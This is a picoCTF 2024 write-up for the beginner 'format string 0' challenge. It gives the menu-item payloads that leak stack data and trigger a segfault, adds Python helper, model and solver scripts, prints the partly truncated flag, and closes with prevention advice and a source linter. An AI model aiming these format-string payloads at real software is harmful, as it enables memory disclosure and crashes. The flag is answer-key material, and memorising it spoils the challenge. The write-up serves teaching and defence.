format string 0 picoCTF 2024 Solution

Published: April 3, 2024

Description

Can you use your knowledge of format strings to make the customers happy?

Remote menu

Connect to mimas.picoctf.net <PORT_FROM_INSTANCE> via netcat.

Observe the menu items in each round and look for strings containing %.

bash
nc mimas.picoctf.net <PORT_FROM_INSTANCE>

This is the introductory format string challenge. Once you understand how format specifiers leak data here, progress to format string 1 for stack leaking and format string 2 for memory overwrites. The Buffer Overflow and Binary Exploitation guide covers format string vulnerabilities in depth alongside stack overflows and heap exploitation.
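
Spotting the suspicious menu items can also be done mechanically. The sketch below scans item names for printf conversion specifiers with a regular expression. The function name find_specifiers and the item Plain_Burger are made up for illustration, and the pattern covers the common C conversions rather than every libc extension.

```python
import re

# Rough pattern for one printf conversion: %[flags][width][.precision][length]conv
SPECIFIER_RE = re.compile(
    r"%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn%]"
)


def find_specifiers(item):
    """Return the conversion specifiers found in a menu item name.

    A literal "%%" is skipped because printf prints it as a plain percent sign.
    """
    return [m.group(0) for m in SPECIFIER_RE.finditer(item) if m.group(0) != "%%"]


# Plain_Burger is a hypothetical harmless item; the other two come from the menu.
for name in ["Plain_Burger", "Gr%114d_Cheese", "Cla%sic_Che%s%steak"]:
    print(name, find_specifiers(name))
```

Any item that returns a non-empty list is a candidate worth ordering.
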
  1. Round 1
    You don't type %114d into nc on its own. You enter the full menu item name, Gr%114d_Cheese, and the server passes that string to printf as the format. Because printf receives no argument to match %d, it renders whatever value sits in the next argument slot, right-justified in a field at least 114 characters wide. The result is a very long output line, which is the point of this round, and it leaks one integer's worth of data along the way. See the format string guide for the full leak primitive.
    bash
    Gr%114d_Cheese

    A format string vulnerability occurs when user-controlled input is passed directly as the format string argument to printf() or similar functions. Instead of printf("%s", user_input), the vulnerable code calls printf(user_input). This allows an attacker to inject format specifiers like %d, %s, %p, and %n that cause printf to read from (or write to) the stack.

    The %114d specifier tells printf to print an integer with a minimum field width of 114 characters. Since the call supplies no integer argument for this specifier, printf reads whatever happens to be in the next argument slot: a leftover register value on x86-64, or a stack word once the register slots are used up. That value could be a pointer, part of a return address, or other sensitive data. This is called stack data leakage.

    What printf does with "Gr%114d_Cheese" when nothing else is pushed:
    
      arg slot 1: rsi (or [rsp+0x00] if 6 args were already used)
                  -> printf reads it as int, prints with width 114
                  -> result is 114-char-wide ASCII rendering of
                     whatever happened to be at that stack slot
    
    Output:
      Gr<105 spaces>123456789_Cheese
      (123456789 stands in for whatever value was leaked)
    
    The "leaked int" is whatever the calling function last left
    in that argument slot before it called printf.

    Format string bugs were extremely prevalent in the late 1990s and early 2000s, leading to high-profile exploits in syslog, wu-ftpd, and many other servers. While modern compilers produce warnings for printf(user_input), the vulnerability still appears in legacy code, embedded systems, and cases where the format string is dynamically constructed.

    The OWASP Testing Guide includes format string testing as part of input validation testing. Fuzzing tools like AFL and libFuzzer can automatically detect format string vulnerabilities by monitoring for crashes or unusual output when format specifiers are injected into inputs.
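
The width behavior from Round 1 is easy to check offline. Python's printf-style % operator applies the same minimum-field-width rule to %d as C's printf, so it can stand in for the server here. This is only a sketch: the value 123456789 is a placeholder for the leaked integer, and render_width_demo is a name chosen for this example.

```python
def render_width_demo(fmt, value):
    """Format one integer using printf-style rules via Python's % operator."""
    return fmt % value


rendered = render_width_demo("Gr%114d_Cheese", 123456789)
print(len(rendered))        # 123 = 2 ("Gr") + 114 (padded field) + 7 ("_Cheese")
print(rendered.count(" "))  # 105 padding spaces in front of the 9 digits
```

The output length does not depend on which integer is leaked, because any 32-bit value fits inside the 114-character field.
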

  2. Round 2
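    Select Cla%sic_Che%s%steak so printf treats each of the three %s specifiers as a string pointer and dereferences whatever sits in the next argument slots. At least one of those values is not a valid address, so the program segfaults, and its SIGSEGV handler prints picoCTF{...}.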
    bash
    Cla%sic_Che%s%steak

    The %s specifier tells printf to treat the next argument as a pointer and print the null-terminated string at that address. When there's no corresponding argument, printf reads the next argument slot anyway and treats it as a string pointer. If that value happens to point to readable memory, whatever string lives there gets printed. If it points to unmapped memory, the program crashes with a segmentation fault (SIGSEGV). In this challenge the crash is the goal: the binary's SIGSEGV handler prints the flag, which explains the SEGFAULT text inside the flag.

    Format string: "Cla%sic_Che%s%steak"
    
    printf walks specifiers in order:
      %s #1 -> deref rsi/rdx/... as char*  -> dump bytes until \0
      %s #2 -> deref next arg              -> dump bytes until \0
      %s #3 -> deref next arg              -> dump bytes until \0
    
    Three reads = three chances that one of the values is not a
    valid pointer and the dereference faults.
    
    What happens on this binary:
      - the flag is loaded into memory at startup
      - a SIGSEGV handler is installed that prints the flag
      - one of the %s dereferences hits a bad address, the
        handler runs, and the flag appears in the output

    Chaining multiple %s specifiers (%s%s%s...) walks further up the stack, reading more memory with each specifier. The attacker doesn't need to know the exact stack layout in advance - they can spray many specifiers and observe which one prints useful data. This brute-force approach makes format string bugs practical even without debugging access.

    The specific menu item names in this challenge are cleverly crafted to hide the format specifiers in plain sight. Cla%sic looks like "Classic" with a typo; Che%s%steak resembles "Cheesesteak." This social engineering aspect - making malicious input look benign - is a technique used in real attacks where format strings appear in log entries, usernames, or other inputs that humans might not scrutinize carefully.
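
The way %s consumes argument slots in Round 2 can be illustrated with a toy model. This is not how libc is implemented; it is a minimal sketch in which arg_slots stands in for leftover register and stack values, memory maps made-up addresses to bytes, and a missing address raises a Python exception in place of a real SIGSEGV. All names and addresses below are hypothetical.

```python
import re


class SegmentationFault(Exception):
    """Raised when the model dereferences an address that is not mapped."""


def model_printf(fmt, arg_slots, memory):
    """Toy model of printf consuming one argument slot per specifier.

    Only %d and %s with an optional width are modeled.
    """
    slots = iter(arg_slots)

    def render(match):
        width = int(match.group(1) or 0)
        value = next(slots, 0)  # the caller supplied nothing, so this is leftover data
        if match.group(2) == "d":
            text = str(value)
        elif value in memory:
            # %s: follow the pointer and copy bytes up to the first NUL
            text = memory[value].split(b"\0")[0].decode("ascii", "replace")
        else:
            raise SegmentationFault(f"bad read at {value:#x}")
        return text.rjust(width)

    return re.sub(r"%(\d*)([ds])", render, fmt)


# Hypothetical layout: one slot holds a valid pointer, the next two do not.
memory = {0x7FFD1000: b"hello\0ignored"}
print(model_printf("Cla%sic", [0x7FFD1000], memory))  # Clahelloic

try:
    model_printf("Cla%sic_Che%s%steak", [0x7FFD1000, 0x41, 0x0], memory)
except SegmentationFault as fault:
    print("crash:", fault)  # crash: bad read at 0x41
```

With three %s specifiers, a single bad slot is enough to stop the whole call, which is why the longer menu item is the more "outrageous" order.
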

Flag

picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_dc...}

Ordering the format-string specials leaks the flag directly in the connection output.
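
The two orders can also be sent from a short script instead of typing them into nc. The sketch below uses only the Python standard library and assumes the service reads one choice per line and closes the connection (or goes quiet) after its final output. The function names solve and extract_flag are chosen for this example, and the port must be taken from your own challenge instance.

```python
import re
import socket

FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")
CHOICES = ["Gr%114d_Cheese", "Cla%sic_Che%s%steak"]  # Round 1, then Round 2


def extract_flag(transcript):
    """Return the first picoCTF{...} token in the transcript, or None."""
    match = FLAG_RE.search(transcript)
    return match.group(0) if match else None


def solve(host, port, timeout=5.0):
    """Send both menu choices and search the server's output for the flag."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(("\n".join(CHOICES) + "\n").encode())
        try:
            while True:
                data = conn.recv(4096)
                if not data:  # server closed the connection
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # no more output within the timeout; use what arrived
    return extract_flag(b"".join(chunks).decode(errors="replace"))
```

Calling print(solve("mimas.picoctf.net", port)) with port set to the instance's port number should print the flag if those assumptions hold.
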

How to prevent this

Format string bugs are almost entirely preventable, and the most common pattern can be caught at compile time. GCC and Clang both ship the controls.

  • Always pass user input as an argument, never as the format itself: printf("%s", user_input), not printf(user_input). Same rule for fprintf, sprintf, syslog, snprintf.
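  • Compile with -Wformat -Wformat-security -Werror=format-security. GCC and Clang will then fail the build on printf(user_input)-style calls. Add -D_FORTIFY_SOURCE=2 (with optimization enabled) for extra glibc runtime checks, including rejecting %n in writable format strings.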
  • In code review, treat any dynamically built format string as a finding. If the format genuinely needs to be variable, build it from a fixed allowlist, never from request data.
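
As a rough aid for the code-review step, the sketch below flags printf-family calls whose format argument is not a string literal. It is a text heuristic written for this article, not a replacement for the compiler warnings above: it does not understand macros, comments, or character literals, and it will flag deliberate wrappers such as translation helpers. The function names are illustrative.

```python
import re

# Position (0-based) of the format-string argument in each function.
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL_RE = re.compile(r"\b(printf|fprintf|sprintf|snprintf|syslog)\s*\(")


def split_args(text, start):
    """Split the argument list starting at text[start], just past '('.

    Tracks parenthesis depth and string literals so commas inside them
    are not treated as separators.
    """
    args, current, depth, in_string = [], [], 0, False
    i = start
    while i < len(text):
        ch = text[i]
        if in_string:
            current.append(ch)
            if ch == "\\" and i + 1 < len(text):
                current.append(text[i + 1])  # keep the escaped character
                i += 1
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
            current.append(ch)
        elif ch == "(":
            depth += 1
            current.append(ch)
        elif ch == ")":
            if depth == 0:  # end of this call's argument list
                args.append("".join(current).strip())
                return args
            depth -= 1
            current.append(ch)
        elif ch == "," and depth == 0:
            args.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    return args  # unbalanced input: return what was collected


def find_nonliteral_formats(c_source):
    """Return (line, function, format_argument) for each suspicious call."""
    findings = []
    for match in CALL_RE.finditer(c_source):
        name = match.group(1)
        args = split_args(c_source, match.end())
        index = FORMAT_ARG_INDEX[name]
        if index < len(args) and not args[index].startswith('"'):
            line = c_source.count("\n", 0, match.start()) + 1
            findings.append((line, name, args[index]))
    return findings


sample = 'printf(user_input);\nprintf("%s", user_input);\nfprintf(stderr, msg);\n'
print(find_nonliteral_formats(sample))
```

On the sample, lines 1 and 3 are reported and the safe printf("%s", user_input) call on line 2 is not.
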
